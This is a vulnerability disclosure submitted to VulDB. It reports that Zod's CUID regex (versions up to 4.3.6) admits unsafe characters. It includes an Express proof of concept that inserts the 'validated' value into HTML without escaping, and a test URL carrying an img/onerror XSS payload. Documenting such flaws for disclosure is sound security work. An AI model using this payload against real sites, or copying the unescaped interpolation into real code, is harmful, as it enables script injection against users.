Submission #796749 information: colinhacks Zod <=4.3.6 Improper Input Validation

Title: colinhacks Zod <=4.3.6 Improper Input Validation
Description:

### Summary

Zod provides functionality to validate data input, primarily from users, and thousands of websites rely on its validation. The CUID data type should only allow alphanumeric characters. Even though CUID is now considered obsolete and the standard recommendation is to use CUID2, Zod should still prevent unsafe characters such as `{} ' ; < >`, which can lead to XSS, SQL Injection, or Command Injection.

### Details

This is the vulnerable regex line: https://github.com/colinhacks/zod/blob/c7805073fef5b6b8857307c3d4b3597a70613bc2/packages/zod/src/v4/core/regexes.ts#L3

### PoC

XSS exploiting the trust placed in CUID-validated input.

```javascript
const express = require('express');
const { z, ZodError } = require('zod');

const app = express();
const PORT = 3000;

// Schema built on Zod's built-in CUID validator (the regex under discussion).
const CuidSchema = z.object({
  id: z.cuid('The provided ID is not a valid CUID.').min(1, 'The ID parameter is required.'),
});

// Middleware: parse the query string against the schema and attach the result.
const validateCuid = (req, res, next) => {
  try {
    const validatedData = CuidSchema.parse(req.query);
    req.validatedQuery = validatedData;
    next();
  } catch (error) {
    if (error instanceof ZodError) {
      return res.status(400).json({
        status: 'error',
        message: 'Input validation failed.',
        errors: error.issues.map(issue => ({ path: issue.path.join('.'), message: issue.message })),
      });
    }
    return res.status(500).json({ status: 'error', message: 'Internal server error.' });
  }
};

app.get('/item', validateCuid, (req, res) => {
  const validCuid = req.validatedQuery.id;
  // The "validated" value is interpolated into HTML without escaping,
  // so anything the CUID regex lets through reaches the browser as markup.
  res.status(200).send(`
    <!DOCTYPE html>
    <html lang="en">
    <body>
      <h1>Valid CUID Received</h1>
      <p>The provided CUID is: <strong>${validCuid}</strong></p>
    </body>
    </html>
  `);
});

app.listen(PORT, () => {
  console.log(`Server running at http://localhost:${PORT}`);
  console.log(`Test a valid route: http://localhost:${PORT}/item?id=ck0a79p0000002p572b1v2s8v`);
  console.log(`Test an invalid route: http://localhost:${PORT}/item?id=c%3Cstrong%3E%3Cimg/src=%221%22onerror=alert(1)%3Ek0a79p0000002p572b1v2s8v`);
});
```

[Screenshot attachment: https://github.com/user-attachments/assets/f36c40ca-e992-4642-94b8-6810f7fe8eed]

### Impact

Improper input validation is a critical security flaw that can lead to severe vulnerabilities like Cross-Site Scripting (XSS), SQL Injection (SQLi), and Remote Code Execution (RCE). This makes it extremely important that input be strictly limited to alphanumeric characters whenever possible. By enforcing this restriction, you prevent malicious characters (like quotes, angle brackets, or semicolons) from being processed by the system's runtime, database, or browser, effectively mitigating these injection risks.
User: dsonbacker (UID 46970)
Submitted: April 3, 2026 23:54 (22 days ago)
Moderation: April 24, 2026 21:38 (21 days later)
Status: Accepted
VulDB entry: 359543 [colinhacks Zod up to 4.3.6 CUID Data Type regexes.ts SQL Injection]
Points: 17
